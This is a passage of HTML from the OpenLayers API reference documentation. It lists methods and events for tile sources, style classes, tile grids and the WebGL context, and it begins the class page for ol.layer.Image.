</li>
<li data-name="ol.source.WMTS#getUrls" class="unstable">
<a href="ol.source.WMTS.html#getUrls">getUrls</a>
</li>
<li data-name="ol.source.WMTS#getVersion" class="unstable">
<a href="ol.source.WMTS.html#getVersion">getVersion</a>
</li>
<li data-name="ol.source.WMTS#on" class="">
<a href="ol.source.WMTS.html#on">on</a>
</li>
<li data-name="ol.source.WMTS#once" class="">
<a href="ol.source.WMTS.html#once">once</a>
</li>
<li data-name="ol.source.WMTS#set" class="">
<a href="ol.source.WMTS.html#set">set</a>
</li>
<li data-name="ol.source.WMTS#setProperties" class="">
<a href="ol.source.WMTS.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.WMTS#setTileLoadFunction" class="unstable">
<a href="ol.source.WMTS.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.WMTS#setTileUrlFunction" class="unstable">
<a href="ol.source.WMTS.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.WMTS#un" class="">
<a href="ol.source.WMTS.html#un">un</a>
</li>
<li data-name="ol.source.WMTS#unByKey" class="">
<a href="ol.source.WMTS.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.WMTS#unset" class="">
<a href="ol.source.WMTS.html#unset">unset</a>
</li>
<li data-name="ol.source.WMTS#updateDimensions" class="unstable">
<a href="ol.source.WMTS.html#updateDimensions">updateDimensions</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.XYZ">
<span class="title">
<a href="ol.source.XYZ.html">ol.source.XYZ</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.XYZ#changed" class="unstable">
<a href="ol.source.XYZ.html#changed">changed</a>
</li>
<li data-name="ol.source.XYZ#get" class="">
<a href="ol.source.XYZ.html#get">get</a>
</li>
<li data-name="ol.source.XYZ#getAttributions" class="">
<a href="ol.source.XYZ.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.XYZ#getKeys" class="">
<a href="ol.source.XYZ.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.XYZ#getLogo" class="">
<a href="ol.source.XYZ.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.XYZ#getProjection" class="unstable">
<a href="ol.source.XYZ.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.XYZ#getProperties" class="">
<a href="ol.source.XYZ.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.XYZ#getRevision" class="unstable">
<a href="ol.source.XYZ.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.XYZ#getState" class="unstable">
<a href="ol.source.XYZ.html#getState">getState</a>
</li>
<li data-name="ol.source.XYZ#getTileGrid" class="">
<a href="ol.source.XYZ.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.XYZ#getTileLoadFunction" class="unstable">
<a href="ol.source.XYZ.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.XYZ#getTileUrlFunction" class="unstable">
<a href="ol.source.XYZ.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.XYZ#on" class="">
<a href="ol.source.XYZ.html#on">on</a>
</li>
<li data-name="ol.source.XYZ#once" class="">
<a href="ol.source.XYZ.html#once">once</a>
</li>
<li data-name="ol.source.XYZ#set" class="">
<a href="ol.source.XYZ.html#set">set</a>
</li>
<li data-name="ol.source.XYZ#setProperties" class="">
<a href="ol.source.XYZ.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.XYZ#setTileLoadFunction" class="unstable">
<a href="ol.source.XYZ.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.XYZ#setTileUrlFunction" class="unstable">
<a href="ol.source.XYZ.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.XYZ#setUrl" class="">
<a href="ol.source.XYZ.html#setUrl">setUrl</a>
</li>
<li data-name="ol.source.XYZ#un" class="">
<a href="ol.source.XYZ.html#un">un</a>
</li>
<li data-name="ol.source.XYZ#unByKey" class="">
<a href="ol.source.XYZ.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.XYZ#unset" class="">
<a href="ol.source.XYZ.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.Zoomify">
<span class="title">
<a href="ol.source.Zoomify.html">ol.source.Zoomify</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.source.Zoomify#changed" class="unstable">
<a href="ol.source.Zoomify.html#changed">changed</a>
</li>
<li data-name="ol.source.Zoomify#get" class="">
<a href="ol.source.Zoomify.html#get">get</a>
</li>
<li data-name="ol.source.Zoomify#getAttributions" class="">
<a href="ol.source.Zoomify.html#getAttributions">getAttributions</a>
</li>
<li data-name="ol.source.Zoomify#getKeys" class="">
<a href="ol.source.Zoomify.html#getKeys">getKeys</a>
</li>
<li data-name="ol.source.Zoomify#getLogo" class="">
<a href="ol.source.Zoomify.html#getLogo">getLogo</a>
</li>
<li data-name="ol.source.Zoomify#getProjection" class="unstable">
<a href="ol.source.Zoomify.html#getProjection">getProjection</a>
</li>
<li data-name="ol.source.Zoomify#getProperties" class="">
<a href="ol.source.Zoomify.html#getProperties">getProperties</a>
</li>
<li data-name="ol.source.Zoomify#getRevision" class="unstable">
<a href="ol.source.Zoomify.html#getRevision">getRevision</a>
</li>
<li data-name="ol.source.Zoomify#getState" class="unstable">
<a href="ol.source.Zoomify.html#getState">getState</a>
</li>
<li data-name="ol.source.Zoomify#getTileGrid" class="">
<a href="ol.source.Zoomify.html#getTileGrid">getTileGrid</a>
</li>
<li data-name="ol.source.Zoomify#getTileLoadFunction" class="unstable">
<a href="ol.source.Zoomify.html#getTileLoadFunction">getTileLoadFunction</a>
</li>
<li data-name="ol.source.Zoomify#getTileUrlFunction" class="unstable">
<a href="ol.source.Zoomify.html#getTileUrlFunction">getTileUrlFunction</a>
</li>
<li data-name="ol.source.Zoomify#on" class="">
<a href="ol.source.Zoomify.html#on">on</a>
</li>
<li data-name="ol.source.Zoomify#once" class="">
<a href="ol.source.Zoomify.html#once">once</a>
</li>
<li data-name="ol.source.Zoomify#set" class="">
<a href="ol.source.Zoomify.html#set">set</a>
</li>
<li data-name="ol.source.Zoomify#setProperties" class="">
<a href="ol.source.Zoomify.html#setProperties">setProperties</a>
</li>
<li data-name="ol.source.Zoomify#setTileLoadFunction" class="unstable">
<a href="ol.source.Zoomify.html#setTileLoadFunction">setTileLoadFunction</a>
</li>
<li data-name="ol.source.Zoomify#setTileUrlFunction" class="unstable">
<a href="ol.source.Zoomify.html#setTileUrlFunction">setTileUrlFunction</a>
</li>
<li data-name="ol.source.Zoomify#un" class="">
<a href="ol.source.Zoomify.html#un">un</a>
</li>
<li data-name="ol.source.Zoomify#unByKey" class="">
<a href="ol.source.Zoomify.html#unByKey">unByKey</a>
</li>
<li data-name="ol.source.Zoomify#unset" class="">
<a href="ol.source.Zoomify.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the state of the source changes." class="unstable">
change Triggered when the state of the source changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadend" class="">
<a href="ol.source.TileEvent.html#event:tileloadend">tileloadend</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloaderror" class="">
<a href="ol.source.TileEvent.html#event:tileloaderror">tileloaderror</a>
</li>
<li data-name="ol.source.TileEvent#event:tileloadstart" class="">
<a href="ol.source.TileEvent.html#event:tileloadstart">tileloadstart</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.source.wms">
<span class="title">
<a href="ol.source.wms.html">ol.source.wms</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.source.wms.ServerType" class="unstable">
<a href="ol.source.wms.html#ServerType">ServerType</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style">
<span class="title">
<a href="ol.style.html">ol.style</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.style.GeometryFunction" class="unstable">
<a href="ol.style.html#GeometryFunction">GeometryFunction</a>
</li>
<li data-name="ol.style.IconAnchorUnits" class="unstable">
<a href="ol.style.html#IconAnchorUnits">IconAnchorUnits</a>
</li>
<li data-name="ol.style.IconOrigin" class="unstable">
<a href="ol.style.html#IconOrigin">IconOrigin</a>
</li>
<li data-name="ol.style.StyleFunction" class="unstable">
<a href="ol.style.html#StyleFunction">StyleFunction</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.AtlasManager">
<span class="title">
<a href="ol.style.AtlasManager.html">ol.style.AtlasManager</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Circle">
<span class="title">
<a href="ol.style.Circle.html">ol.style.Circle</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Circle#getAnchor" class="unstable">
<a href="ol.style.Circle.html#getAnchor">getAnchor</a>
</li>
<li data-name="ol.style.Circle#getFill" class="unstable">
<a href="ol.style.Circle.html#getFill">getFill</a>
</li>
<li data-name="ol.style.Circle#getImage" class="unstable">
<a href="ol.style.Circle.html#getImage">getImage</a>
</li>
<li data-name="ol.style.Circle#getOpacity" class="unstable">
<a href="ol.style.Circle.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.style.Circle#getOrigin" class="unstable">
<a href="ol.style.Circle.html#getOrigin">getOrigin</a>
</li>
<li data-name="ol.style.Circle#getRadius" class="unstable">
<a href="ol.style.Circle.html#getRadius">getRadius</a>
</li>
<li data-name="ol.style.Circle#getRotateWithView" class="unstable">
<a href="ol.style.Circle.html#getRotateWithView">getRotateWithView</a>
</li>
<li data-name="ol.style.Circle#getRotation" class="unstable">
<a href="ol.style.Circle.html#getRotation">getRotation</a>
</li>
<li data-name="ol.style.Circle#getScale" class="unstable">
<a href="ol.style.Circle.html#getScale">getScale</a>
</li>
<li data-name="ol.style.Circle#getSize" class="unstable">
<a href="ol.style.Circle.html#getSize">getSize</a>
</li>
<li data-name="ol.style.Circle#getSnapToPixel" class="unstable">
<a href="ol.style.Circle.html#getSnapToPixel">getSnapToPixel</a>
</li>
<li data-name="ol.style.Circle#getStroke" class="unstable">
<a href="ol.style.Circle.html#getStroke">getStroke</a>
</li>
<li data-name="ol.style.Circle#setRotation" class="unstable">
<a href="ol.style.Circle.html#setRotation">setRotation</a>
</li>
<li data-name="ol.style.Circle#setScale" class="unstable">
<a href="ol.style.Circle.html#setScale">setScale</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Fill">
<span class="title">
<a href="ol.style.Fill.html">ol.style.Fill</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Fill#getColor" class="unstable">
<a href="ol.style.Fill.html#getColor">getColor</a>
</li>
<li data-name="ol.style.Fill#setColor" class="unstable">
<a href="ol.style.Fill.html#setColor">setColor</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Icon">
<span class="title">
<a href="ol.style.Icon.html">ol.style.Icon</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Icon#getAnchor" class="unstable">
<a href="ol.style.Icon.html#getAnchor">getAnchor</a>
</li>
<li data-name="ol.style.Icon#getImage" class="unstable">
<a href="ol.style.Icon.html#getImage">getImage</a>
</li>
<li data-name="ol.style.Icon#getOpacity" class="unstable">
<a href="ol.style.Icon.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.style.Icon#getOrigin" class="unstable">
<a href="ol.style.Icon.html#getOrigin">getOrigin</a>
</li>
<li data-name="ol.style.Icon#getRotateWithView" class="unstable">
<a href="ol.style.Icon.html#getRotateWithView">getRotateWithView</a>
</li>
<li data-name="ol.style.Icon#getRotation" class="unstable">
<a href="ol.style.Icon.html#getRotation">getRotation</a>
</li>
<li data-name="ol.style.Icon#getScale" class="unstable">
<a href="ol.style.Icon.html#getScale">getScale</a>
</li>
<li data-name="ol.style.Icon#getSize" class="unstable">
<a href="ol.style.Icon.html#getSize">getSize</a>
</li>
<li data-name="ol.style.Icon#getSnapToPixel" class="unstable">
<a href="ol.style.Icon.html#getSnapToPixel">getSnapToPixel</a>
</li>
<li data-name="ol.style.Icon#getSrc" class="unstable">
<a href="ol.style.Icon.html#getSrc">getSrc</a>
</li>
<li data-name="ol.style.Icon#setRotation" class="unstable">
<a href="ol.style.Icon.html#setRotation">setRotation</a>
</li>
<li data-name="ol.style.Icon#setScale" class="unstable">
<a href="ol.style.Icon.html#setScale">setScale</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Image">
<span class="title">
<a href="ol.style.Image.html">ol.style.Image</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Image#getOpacity" class="unstable">
<a href="ol.style.Image.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.style.Image#getRotateWithView" class="unstable">
<a href="ol.style.Image.html#getRotateWithView">getRotateWithView</a>
</li>
<li data-name="ol.style.Image#getRotation" class="unstable">
<a href="ol.style.Image.html#getRotation">getRotation</a>
</li>
<li data-name="ol.style.Image#getScale" class="unstable">
<a href="ol.style.Image.html#getScale">getScale</a>
</li>
<li data-name="ol.style.Image#getSnapToPixel" class="unstable">
<a href="ol.style.Image.html#getSnapToPixel">getSnapToPixel</a>
</li>
<li data-name="ol.style.Image#setRotation" class="unstable">
<a href="ol.style.Image.html#setRotation">setRotation</a>
</li>
<li data-name="ol.style.Image#setScale" class="unstable">
<a href="ol.style.Image.html#setScale">setScale</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.RegularShape">
<span class="title">
<a href="ol.style.RegularShape.html">ol.style.RegularShape</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.RegularShape#getAnchor" class="unstable">
<a href="ol.style.RegularShape.html#getAnchor">getAnchor</a>
</li>
<li data-name="ol.style.RegularShape#getAngle" class="unstable">
<a href="ol.style.RegularShape.html#getAngle">getAngle</a>
</li>
<li data-name="ol.style.RegularShape#getFill" class="unstable">
<a href="ol.style.RegularShape.html#getFill">getFill</a>
</li>
<li data-name="ol.style.RegularShape#getImage" class="unstable">
<a href="ol.style.RegularShape.html#getImage">getImage</a>
</li>
<li data-name="ol.style.RegularShape#getOpacity" class="unstable">
<a href="ol.style.RegularShape.html#getOpacity">getOpacity</a>
</li>
<li data-name="ol.style.RegularShape#getOrigin" class="unstable">
<a href="ol.style.RegularShape.html#getOrigin">getOrigin</a>
</li>
<li data-name="ol.style.RegularShape#getPoints" class="unstable">
<a href="ol.style.RegularShape.html#getPoints">getPoints</a>
</li>
<li data-name="ol.style.RegularShape#getRadius" class="unstable">
<a href="ol.style.RegularShape.html#getRadius">getRadius</a>
</li>
<li data-name="ol.style.RegularShape#getRadius2" class="unstable">
<a href="ol.style.RegularShape.html#getRadius2">getRadius2</a>
</li>
<li data-name="ol.style.RegularShape#getRotateWithView" class="unstable">
<a href="ol.style.RegularShape.html#getRotateWithView">getRotateWithView</a>
</li>
<li data-name="ol.style.RegularShape#getRotation" class="unstable">
<a href="ol.style.RegularShape.html#getRotation">getRotation</a>
</li>
<li data-name="ol.style.RegularShape#getScale" class="unstable">
<a href="ol.style.RegularShape.html#getScale">getScale</a>
</li>
<li data-name="ol.style.RegularShape#getSize" class="unstable">
<a href="ol.style.RegularShape.html#getSize">getSize</a>
</li>
<li data-name="ol.style.RegularShape#getSnapToPixel" class="unstable">
<a href="ol.style.RegularShape.html#getSnapToPixel">getSnapToPixel</a>
</li>
<li data-name="ol.style.RegularShape#getStroke" class="unstable">
<a href="ol.style.RegularShape.html#getStroke">getStroke</a>
</li>
<li data-name="ol.style.RegularShape#setRotation" class="unstable">
<a href="ol.style.RegularShape.html#setRotation">setRotation</a>
</li>
<li data-name="ol.style.RegularShape#setScale" class="unstable">
<a href="ol.style.RegularShape.html#setScale">setScale</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Stroke">
<span class="title">
<a href="ol.style.Stroke.html">ol.style.Stroke</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Stroke#getColor" class="unstable">
<a href="ol.style.Stroke.html#getColor">getColor</a>
</li>
<li data-name="ol.style.Stroke#getLineCap" class="unstable">
<a href="ol.style.Stroke.html#getLineCap">getLineCap</a>
</li>
<li data-name="ol.style.Stroke#getLineDash" class="unstable">
<a href="ol.style.Stroke.html#getLineDash">getLineDash</a>
</li>
<li data-name="ol.style.Stroke#getLineJoin" class="unstable">
<a href="ol.style.Stroke.html#getLineJoin">getLineJoin</a>
</li>
<li data-name="ol.style.Stroke#getMiterLimit" class="unstable">
<a href="ol.style.Stroke.html#getMiterLimit">getMiterLimit</a>
</li>
<li data-name="ol.style.Stroke#getWidth" class="unstable">
<a href="ol.style.Stroke.html#getWidth">getWidth</a>
</li>
<li data-name="ol.style.Stroke#setColor" class="unstable">
<a href="ol.style.Stroke.html#setColor">setColor</a>
</li>
<li data-name="ol.style.Stroke#setLineCap" class="unstable">
<a href="ol.style.Stroke.html#setLineCap">setLineCap</a>
</li>
<li data-name="ol.style.Stroke#setLineDash" class="unstable">
<a href="ol.style.Stroke.html#setLineDash">setLineDash</a>
</li>
<li data-name="ol.style.Stroke#setLineJoin" class="unstable">
<a href="ol.style.Stroke.html#setLineJoin">setLineJoin</a>
</li>
<li data-name="ol.style.Stroke#setMiterLimit" class="unstable">
<a href="ol.style.Stroke.html#setMiterLimit">setMiterLimit</a>
</li>
<li data-name="ol.style.Stroke#setWidth" class="unstable">
<a href="ol.style.Stroke.html#setWidth">setWidth</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Style">
<span class="title">
<a href="ol.style.Style.html">ol.style.Style</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Style#getFill" class="unstable">
<a href="ol.style.Style.html#getFill">getFill</a>
</li>
<li data-name="ol.style.Style#getGeometry" class="unstable">
<a href="ol.style.Style.html#getGeometry">getGeometry</a>
</li>
<li data-name="ol.style.Style#getGeometryFunction" class="unstable">
<a href="ol.style.Style.html#getGeometryFunction">getGeometryFunction</a>
</li>
<li data-name="ol.style.Style#getImage" class="unstable">
<a href="ol.style.Style.html#getImage">getImage</a>
</li>
<li data-name="ol.style.Style#getStroke" class="unstable">
<a href="ol.style.Style.html#getStroke">getStroke</a>
</li>
<li data-name="ol.style.Style#getText" class="unstable">
<a href="ol.style.Style.html#getText">getText</a>
</li>
<li data-name="ol.style.Style#getZIndex" class="unstable">
<a href="ol.style.Style.html#getZIndex">getZIndex</a>
</li>
<li data-name="ol.style.Style#setGeometry" class="unstable">
<a href="ol.style.Style.html#setGeometry">setGeometry</a>
</li>
<li data-name="ol.style.Style#setZIndex" class="unstable">
<a href="ol.style.Style.html#setZIndex">setZIndex</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.style.Text">
<span class="title">
<a href="ol.style.Text.html">ol.style.Text</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.style.Text#getFill" class="unstable">
<a href="ol.style.Text.html#getFill">getFill</a>
</li>
<li data-name="ol.style.Text#getFont" class="unstable">
<a href="ol.style.Text.html#getFont">getFont</a>
</li>
<li data-name="ol.style.Text#getOffsetX" class="unstable">
<a href="ol.style.Text.html#getOffsetX">getOffsetX</a>
</li>
<li data-name="ol.style.Text#getOffsetY" class="unstable">
<a href="ol.style.Text.html#getOffsetY">getOffsetY</a>
</li>
<li data-name="ol.style.Text#getRotation" class="unstable">
<a href="ol.style.Text.html#getRotation">getRotation</a>
</li>
<li data-name="ol.style.Text#getScale" class="unstable">
<a href="ol.style.Text.html#getScale">getScale</a>
</li>
<li data-name="ol.style.Text#getStroke" class="unstable">
<a href="ol.style.Text.html#getStroke">getStroke</a>
</li>
<li data-name="ol.style.Text#getText" class="unstable">
<a href="ol.style.Text.html#getText">getText</a>
</li>
<li data-name="ol.style.Text#getTextAlign" class="unstable">
<a href="ol.style.Text.html#getTextAlign">getTextAlign</a>
</li>
<li data-name="ol.style.Text#getTextBaseline" class="unstable">
<a href="ol.style.Text.html#getTextBaseline">getTextBaseline</a>
</li>
<li data-name="ol.style.Text#setFill" class="unstable">
<a href="ol.style.Text.html#setFill">setFill</a>
</li>
<li data-name="ol.style.Text#setFont" class="unstable">
<a href="ol.style.Text.html#setFont">setFont</a>
</li>
<li data-name="ol.style.Text#setRotation" class="unstable">
<a href="ol.style.Text.html#setRotation">setRotation</a>
</li>
<li data-name="ol.style.Text#setScale" class="unstable">
<a href="ol.style.Text.html#setScale">setScale</a>
</li>
<li data-name="ol.style.Text#setStroke" class="unstable">
<a href="ol.style.Text.html#setStroke">setStroke</a>
</li>
<li data-name="ol.style.Text#setText" class="unstable">
<a href="ol.style.Text.html#setText">setText</a>
</li>
<li data-name="ol.style.Text#setTextAlign" class="unstable">
<a href="ol.style.Text.html#setTextAlign">setTextAlign</a>
</li>
<li data-name="ol.style.Text#setTextBaseline" class="unstable">
<a href="ol.style.Text.html#setTextBaseline">setTextBaseline</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.tilegrid">
<span class="title">
<a href="ol.tilegrid.html">ol.tilegrid</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.tilegrid.createXYZ" class="unstable">
<a href="ol.tilegrid.html#createXYZ">createXYZ</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.tilegrid.TileGrid">
<span class="title">
<a href="ol.tilegrid.TileGrid.html">ol.tilegrid.TileGrid</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.tilegrid.TileGrid#getMaxZoom" class="unstable">
<a href="ol.tilegrid.TileGrid.html#getMaxZoom">getMaxZoom</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getMinZoom" class="unstable">
<a href="ol.tilegrid.TileGrid.html#getMinZoom">getMinZoom</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getOrigin" class="">
<a href="ol.tilegrid.TileGrid.html#getOrigin">getOrigin</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getResolution" class="">
<a href="ol.tilegrid.TileGrid.html#getResolution">getResolution</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getResolutions" class="">
<a href="ol.tilegrid.TileGrid.html#getResolutions">getResolutions</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getTileCoordForCoordAndResolution" class="unstable">
<a href="ol.tilegrid.TileGrid.html#getTileCoordForCoordAndResolution">getTileCoordForCoordAndResolution</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getTileCoordForCoordAndZ" class="unstable">
<a href="ol.tilegrid.TileGrid.html#getTileCoordForCoordAndZ">getTileCoordForCoordAndZ</a>
</li>
<li data-name="ol.tilegrid.TileGrid#getTileSize" class="">
<a href="ol.tilegrid.TileGrid.html#getTileSize">getTileSize</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.tilegrid.WMTS">
<span class="title">
<a href="ol.tilegrid.WMTS.html">ol.tilegrid.WMTS</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.tilegrid.WMTS.createFromCapabilitiesMatrixSet" class="unstable">
<a href="ol.tilegrid.WMTS.html#createFromCapabilitiesMatrixSet">createFromCapabilitiesMatrixSet</a>
</li>
<li data-name="ol.tilegrid.WMTS#getMatrixIds" class="unstable">
<a href="ol.tilegrid.WMTS.html#getMatrixIds">getMatrixIds</a>
</li>
<li data-name="ol.tilegrid.WMTS#getMaxZoom" class="unstable">
<a href="ol.tilegrid.WMTS.html#getMaxZoom">getMaxZoom</a>
</li>
<li data-name="ol.tilegrid.WMTS#getMinZoom" class="unstable">
<a href="ol.tilegrid.WMTS.html#getMinZoom">getMinZoom</a>
</li>
<li data-name="ol.tilegrid.WMTS#getOrigin" class="">
<a href="ol.tilegrid.WMTS.html#getOrigin">getOrigin</a>
</li>
<li data-name="ol.tilegrid.WMTS#getResolution" class="">
<a href="ol.tilegrid.WMTS.html#getResolution">getResolution</a>
</li>
<li data-name="ol.tilegrid.WMTS#getResolutions" class="">
<a href="ol.tilegrid.WMTS.html#getResolutions">getResolutions</a>
</li>
<li data-name="ol.tilegrid.WMTS#getTileCoordForCoordAndResolution" class="unstable">
<a href="ol.tilegrid.WMTS.html#getTileCoordForCoordAndResolution">getTileCoordForCoordAndResolution</a>
</li>
<li data-name="ol.tilegrid.WMTS#getTileCoordForCoordAndZ" class="unstable">
<a href="ol.tilegrid.WMTS.html#getTileCoordForCoordAndZ">getTileCoordForCoordAndZ</a>
</li>
<li data-name="ol.tilegrid.WMTS#getTileSize" class="">
<a href="ol.tilegrid.WMTS.html#getTileSize">getTileSize</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.webgl.Context">
<span class="title">
<a href="ol.webgl.Context.html">ol.webgl.Context</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.webgl.Context#getGL" class="unstable">
<a href="ol.webgl.Context.html#getGL">getGL</a>
</li>
<li data-name="ol.webgl.Context#getHitDetectionFramebuffer" class="unstable">
<a href="ol.webgl.Context.html#getHitDetectionFramebuffer">getHitDetectionFramebuffer</a>
</li>
<li data-name="ol.webgl.Context#useProgram" class="unstable">
<a href="ol.webgl.Context.html#useProgram">useProgram</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
</ul>
</div>
<div class="main">
<h1 class="page-title" data-filename="ol.layer.Image.html">Class: Image</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="ol.html">ol</a><a href="ol.layer.html">.layer</a>.</span>Image
</h2>
<div class="class-description"><p>Server-rendered images that are available for arbitrary extents and
resolutions.
Note that any property set in the options is set as a <a href="ol.Object.html"><code>ol.Object</code></a>
property on the layer object; for example, setting <code>title: 'My Title'</code> in the
options means that <code>title</code> is observable, and has get/set accessors.</p></div>
</header>
<article>
<div class="container-overview">
<dt class="">
<div class="nameContainer">
<h4 class="name" id="Image">
new ol.layer.Image<span class="signature">(<span class="optional">opt_options</span>)</span>
</h4>
<div class="tag-source">
src/ol/layer/imagelayer.js, line 21
</div>
</div>
</dt>
<dd class="">
<table class="params">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr class="">
